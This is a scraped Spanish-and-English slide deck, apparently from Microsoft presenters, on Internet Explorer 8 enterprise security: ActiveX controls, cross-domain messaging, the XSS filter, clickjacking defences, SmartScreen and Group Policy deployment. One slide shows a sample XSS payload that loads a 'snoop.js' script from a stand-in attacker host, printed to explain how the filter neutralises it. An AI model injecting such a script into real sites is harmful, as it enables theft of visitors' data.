This document discusses Internet Explorer security and deployment strategies for Internet Explorer 8. It provides a brief history of Internet Explorer versions and their new security features. It then covers specific IE8 security enhancements like XSS filtering, clickjacking defenses, and SmartScreen filtering. The document also discusses centralized management using Group Policy and customizing IE8 deployment with IEAK. It concludes with recommendations for upgrading users and sites from older IE versions to IE8.
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Seguridad Corporativa con IE8
1. Seguridad Corporativa con Internet Explorer 8 Alejandro Ponicke aponicke@microsoft.com Juan Ladetto juanl@microsoft.com
2. Agenda Evolución de Internet Explorer. Historia. El Browser como puerta de entrada a las amenazas que pululan en Internet, navegación responsable. Cross-side scripting (XSS exploits), ClickJacking y SmartScreen filtering. La mejor ayuda desde el lugar menos pensado: El poder de GroupPolicies controlando IE. Optimización de deployment. Recomendaciones. Extensibilidad: Caso de Uso “IE forKids”. Introducción a IEAK. Usos.
3. Evolución de Internet Explorer Internet Explorer 1 – 15 de Agosto 1995 Parte de Microsoft Plus (Internet Jumpstart Kit in Plus!) - Internet Explorer 1.5 sale unosmesesmástarde y soporta rendering de tablas Internet Explorer 2 – 22 de Noviembre 1995 Ahorasoporta SSL, cookies, VRML, newsgroups Internet Explorer 3 – 13 de Agosto 1996 Se empieza a volver popular, el primer browser en soportarcss, se agrega java y controlesactiveX, sale con otrosagregados: mail y news, netmeeting y adreess Book (internet y los browsers empiezan a serblanco de los hackers Internet Explorer 4 – 17 de Setiembre 1997 Se adapta al SO y ahora con windows desktop update y convierte a windows desktop en Active desktop. Ahorasoporta group policy, internet mail esoutook express y ahoratambién sale con MS chat
4. Evolución de Internet Explorer Internet Explorer 5 – 18 de Marzo 1999 Incluído en windows 98 SE, ahorasoporta bidirectional text, xml, xlt, caracteres ruby , textobidireccional, mhtml y lo mejor de todonaceajax (xmlhttprequest), últimaversiónpara mac y unix Ie 5.5 agregassl de 128 bits, mejoras en printing, html y css compatible con estándares
6. Evolución de Internet Explorer Internet Explorer 6 – 27 de Agosto 2001 Mejoras en DHTML, inline frames, soporteparcialparacss 1, dom 1 y SMIL 2.0, ieak (ahora se puedecustomizar) En 2010 se acaba el soporte de estaversión Internet Explorer 7 – 18 de Octubre 2006 Mejoras en los estándares web, navegaciónpor tabs, search, filtroantiphishing y variasmás Internet Explorer 8 – 19 de Marzo 2009 Seguridad, facilidad de acceso, estándares, rss, css y ajaxes la prioridad. motores de rendering (ie7) Internet Explorer 9 - ???
8. Evolution & Change Web 2.0 - significant benefits & challenges Blended threats shifting from the browser Decreasing consumer trust and confidence Data Governance & Regulations Privacy & User Preferences Rapid pace of threat innovation Organized Crime On The Rise Spy Corp Data & National Interest Personal Gain Thief / Organized International Crime Personal Fame Curiosity Vandal Amateur Expert Specialist Script-Kiddy
10. Top Concerns Top User Concerns Protection from intrusions Protection from harm Control on data / privacy Business Concerns Data governance / corporate IP Business Interruption / productivity Impact to brand on consumer confidence
11. Internet Explorer 8 Trustworthy Browsing Build on a secure foundation Security Development Lifecycle (SDL) Protected Mode ActiveX Controls DEP - Data Execution Prevention Browser Vulnerabilities Extends browser protection to the web server Http only cookies Group Policies XDomainRequest - Cross Domain Requests XDM - Cross Domain Messaging XSS Filter - Cross Site Scripting ClickJacking Defense Web Server & Applications Confidently bank, communicate & shop Extended Validation (EV) SSL Certificates SmartScreen® Filter – Blocks Phishing & Malware Domain Highlighting Enhanced Delete Browsing History InPrivate™ Browsing & Blocking Social Engineering & Privacy IE 7, IE 8
13. Browser Vulnerabilities ActiveX Hardening & Enhancements Can it be used? Opt –in Is control permitted to run in browser without prompt? IE7 Exploit Controls ActiveX Killbits Has control been flagged as unsafe? IE5 Where? Per site Is control permitted to run on this site? IE8
14. Browser Vulnerabilities ActiveX Hardening & Enhancements Doesn’t require users to have admin privileges to install Can be disabled through Group Policy Who? Per User Doesn’t req. elevating admin privileges
16. Web Server & Applications Secure data exchangeCross Domain Communication SameOrigin Policy Permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions — but prevents access to most methods and properties across pages on different sites. Workarounds can be dangerous & costly
17. Web Server & Applications Secure data exchangeInvestments in securing Web 2.0 Cross Domain Request (XDomainRequest) Enables web developers to more securely communicate between domains Provides a mechanism to establish trust between domains through an explicit acknowledgement of sharing cross domain, and both parties know which sites are sharing information Proposed to W3C for standardization Cross Document Messaging (XDM) Enables two domains to establish a trust relationship to exchange object messages Provides a web developer a more secure mechanism to build cross domain communication Part of the HTML5 specification
18. Web Server & Applications XSS Exploits The new buffer overflow; steal cookies & history Log keystrokes Deface sites Steal credentials XSS Filter neuters the attack Blocks the malicious script from executing Port-scan the Intranet Abuse browser/AX vulnerabilities Evade phishing filters Circumvent HTTPS
20. Web Server & Applications Behind The Scenes… Malicious URL in email contains encoded string:http://www.woodgrovebank.co.uk/woodgrovebank.asp?SID=%22%3E%3C%73%63%72... Vulnerable application adds <script> tag to page:<script for=window event=onloadsrc="http://hackersite.ie8demos.com/snoop.js"> </script> Generated Signature: <SC{R}IPT¤src¤¤http¤¤¤hackersite¤ie8demos¤com¤snoop¤js¤> Neutered Script: <SC#IPT src=http://hackersite.ie8demos.com/snoop.js>
21. Web Server & Applications ClickJacking Type of Cross Site Request Forgery Entices users to click on content from another domain without the user realizing it. Evolving server exploit Impacts all browsers, only IE 8 has integrated protection capabilities Add an X-FRAME-OPTIONS tag in either the HTTP header. Deny all or allow from SameOrigin hosts
26. Social Engineering & Privacy EV SSL CertificatesLook for the Green Provides consumers added user confidence and brands enhanced protection Implemented by over 10,000 leading commerce, banking and transactional sites
27. Social Engineering & Privacy Domain Highlighting Helps to more accurately ascertain the domain of the site they are visiting The domain is black, vs. other characters which are gray
28. Social Engineering & Privacy SmartScreen™ Filteroffering dynamic protection from Phishing Malware
30. User Choice & Control Social Engineering & Privacy Delete Browsing History InPrivate Browsing InPrivate Filtering
31. Social Engineering & Privacy Delete Browsing History New option to Delete Browsing History while retaining favorites
32. Social Engineering & Privacy Third Party Content Serving Over time, users’ history and profiles can unknowingly be aggregated Any third-party content can be used like a tracking cookie There is little end-user notification or control today Syndicated photos, weather, stocks, news articles; local analytics, etc…. Unclear accountability with third party security & privacy policies Tailspintoys.com Woodgrovebank.com Farbrikan.com Southridge1-1.com Litware-bulk.com adventureworks.com Northwintd.com Contoso.com User Visits Unique Sites Prosware-sol.com 3rd party Syndicator Web server
42. Y ahora?actualizandousuarios y sitiosdesde IE6 Migraresmásque un deploy de unanuevaversión (peronecesitamosdar el paso) Los cambios no son sencillospero… http://blogs.msdn.com/ie http://msdn.com/ie http://msdn.com/iecompat http://technet.microsoft.com/en-us/ie/bb219517.aspx
Platform :: App :: UserVuln Expense – Profit drivesAs the platform layer has become more secure over the last five years, vulnerabilities become harder to find and more valuable. You need more skill to find these sorts of vulns, so vandals and script kiddies are forced out of that space and up the application stack to productivity and web applications, as well as social engineering attacks.Criminals are motivated by profit, not glory. Platform vulns are hard (and therefore expensive) to find when applications or configuration errors are easier to exploit.
FF3 Released in June 2008*28 of the 50 IE7 CVEs are duplicates**30 CVEs impact FF2 and FF3 and are counted against bothCVE data is publicly available, and vendor neutral.
Users don’t say “I’m worried about XSS”Users care that it works safely. They care about…Businesses think more about specific threats they have heard of/experienced, but what they REALLY care about is ip/data safety, meeting policy and regs, and brand reputation
We took this feedback, looked at the evolving layers of the security ecosystem & emerging threats, and addressed IE8 security features in a similarly layered fashion.Platform. App. User.
Hack the Platform!
Internet Explorer 8 provides for greater administrator management of ActiveX controls through per-user ActiveX and per-site ActiveX.Per-User ActiveX In Internet Explorer 8, per-user ActiveX makes it possible for standard users running on Windows Vista to install ActiveX controls in their own user profile, without requiring administrative privileges. This makes it easier for an organization to realize the full benefit of User Account Control by enabling standard users to install ActiveX controls that are used in their day-to-day browsing. In this way, if a user happens to install a malicious ActiveX control, the overall system will be unaffected, as the control was installed only under the user’s account. Since installations can be restricted to a user profile, the risk and cost of compromise (and, in turn, the total cost of administering users on a machine) are lowered significantly.As in Internet Explorer 7, when a webpage attempts to install a control, an Information Bar is displayed to the user. By clicking on the information bar, users can choose to either install the control machine-wide, or install it only for their own user account. The options in this menu will vary depending on the rights of the user (as managed with Group Policy settings for per-user ActiveX installations) and whether or not the control has been packaged to allow per-user installation. While this feature offers the possibility of lowering total cost of ownership, IT Administrators running managed environments also can elect to disable this feature via Group Policy.Opt-inIE8 also allows users to determine if an ActiveX control can be run on a site. This mechanism is called Opt-in and was present in IE7. It would appear as an information bar at the top of the browser before an ActiveX control was installed.Per-Site ActiveXWhen a user navigates to a Web site containing an ActiveX control, IE8 performs a number of checks, including a determination of where a control is permitted to run—a defense mechanism intended to help prevent malicious repurposing of controls. If a control is installed but is not permitted to run on a specific site, an Information Bar appears asking the user whether or not the control should be permitted to run on the current Web site or on all Web sites. IT administrators can use Group Policy to preset allowed controls and their associated domains.ActiveX KillbitsFinally, site owners can prevent an ActiveX control from running in Internet Explorer by setting the kill bit so that the control is never called by Internet Explorer when default settings are used.
Internet Explorer 8 provides for greater administrator management of ActiveX controls through per-user ActiveX and per-site ActiveX.Per-User ActiveX In Internet Explorer 8, per-user ActiveX makes it possible for standard users running on Windows Vista to install ActiveX controls in their own user profile, without requiring administrative privileges. This makes it easier for an organization to realize the full benefit of User Account Control by enabling standard users to install ActiveX controls that are used in their day-to-day browsing. In this way, if a user happens to install a malicious ActiveX control, the overall system will be unaffected, as the control was installed only under the user’s account. Since installations can be restricted to a user profile, the risk and cost of compromise (and, in turn, the total cost of administering users on a machine) are lowered significantly.As in Internet Explorer 7, when a webpage attempts to install a control, an Information Bar is displayed to the user. By clicking on the information bar, users can choose to either install the control machine-wide, or install it only for their own user account. The options in this menu will vary depending on the rights of the user (as managed with Group Policy settings for per-user ActiveX installations) and whether or not the control has been packaged to allow per-user installation. While this feature offers the possibility of lowering total cost of ownership, IT Administrators running managed environments also can elect to disable this feature via Group Policy.Opt-inIE8 also allows users to determine if an ActiveX control can be run on a site. This mechanism is called Opt-in and was present in IE7. It would appear as an information bar at the top of the browser before an ActiveX control was installed.Per-Site ActiveXWhen a user navigates to a Web site containing an ActiveX control, IE8 performs a number of checks, including a determination of where a control is permitted to run—a defense mechanism intended to help prevent malicious repurposing of controls. If a control is installed but is not permitted to run on a specific site, an Information Bar appears asking the user whether or not the control should be permitted to run on the current Web site or on all Web sites. IT administrators can use Group Policy to preset allowed controls and their associated domains.ActiveX KillbitsFinally, site owners can prevent an ActiveX control from running in Internet Explorer by setting the kill bit so that the control is never called by Internet Explorer when default settings are used.
Hack the Application!
Thing is, we WANT to be able to mashup data and webby goodness. How do you protect against malicious scripts while enabling Web 2.0?
The XDR object introduces a gate and guards into the picture. Your site can use the XDR object to get data from other domain’s servers in a safe and simple way. XDR is good for servers and pages.IE sends the server your domain name so it can do security checks. It may want to block requests from most domains. IE also strips personal user-data like cookies from outgoing requests so the user-data isn’t compromised.IE checks the server response to ensure the domain matches what you expect.The data is transferred as a text string instead, which you can use or parse.We’ve also introduced another new feature to increase security for cross domain communication.XDM is similar to XDR in that it is a safe and easy to use mechanism for cross domain communication. However, XDM is used to transfer data between domains in different documents within the browser. For example; these documents can just be two frames in a single page or pages in different tabs.Both documents opt-into transferring data and then do so using the postmessage() object
XSS Exploits are relatively common, and an easy way for an attacker to deliver malicious content or steal user data. Web developers can make this harder for Bad Guys by doing proper input/output sanitization; even introducing length checks alone makes the attackers life harder. -news content injection example-It would be great if all websites were developed securely and immune to this, but they aren’t. So in IE8 we are introducing a XSS filter to protect against the most common type of XSS attack, the Type 1 or reflected attack. And my lovely assistant James is going to come demonstrate just how this works.
KPrice
ONE MORE TIME!!!Just in case the demo $DEITY was not favoring us today…
The SmartScreen Filter now includes a new security feature designed to help detect and prevent “ClickJacking”. This feature is always enabled and cannot be disabled.ClickJacking is an attack whereby an attacker’s web page entices the user to click on content delivered from another domain (or from a native security prompt) without the user realizing it. ClickJacking renders most anti-CSRF (cross site request forgery) mitigations defenseless, and can be used to reconfigure certain browser add-ons in unsafe ways. Attackers show a set of dummy buttons, then load another page over it in a transparent layer. The user thinks he is clicking the visible buttons, while he/she is actually performing actions on the hidden page. The hidden page may be an authentic page, and therefore the attackers can trick users into performing actions which the users never intended to do and there is no way tracing such actions later, as the user was genuinely authenticated on the other pageMicrosoft is working with the borwser community to support this solution and instruct all sites to include the tag on every page on their site
Hack the User!
Ultimately we want to help users make safe, responsible choices without having to be a security expert, and give them confidence in their safety online.
Brand enhancing, to build user confidencealso user education/reinforcementIf cert is bad, browser gives warning page and recommends not continuing to the site.
Emerging threat vectors & diversificationNeed to help address needs & concerns of:Users, Businesses, Brands and Site owners SmartScreen® Filter Integrated Phishing & Malware download protectionExamines URL string, preempting evolving threats Blocks 1 million+ weekly phishing attempts (IE7 & IE8)Significant malware site detection volumes ~10 x traffic as compared to phishing, (IE8 beta users).Blocking 1,000’s of new phishing sites daily. Group Policy support – Key IT requirement24 x 7support processes and feedback mechanisms
Emerging threat vectors & diversificationNeed to help address needs & concerns of:Users, Businesses, Brands and Site owners SmartScreen® Filter Integrated Phishing & Malware download protectionExamines URL string, preempting evolving threats Blocks 1 million+ weekly phishing attempts (IE7 & IE8)Significant malware site detection volumes ~10 x traffic as compared to phishing, (IE8 beta users).Blocking 1,000’s of new phishing sites daily. Group Policy support – Key IT requirement24 x 7support processes and feedback mechanisms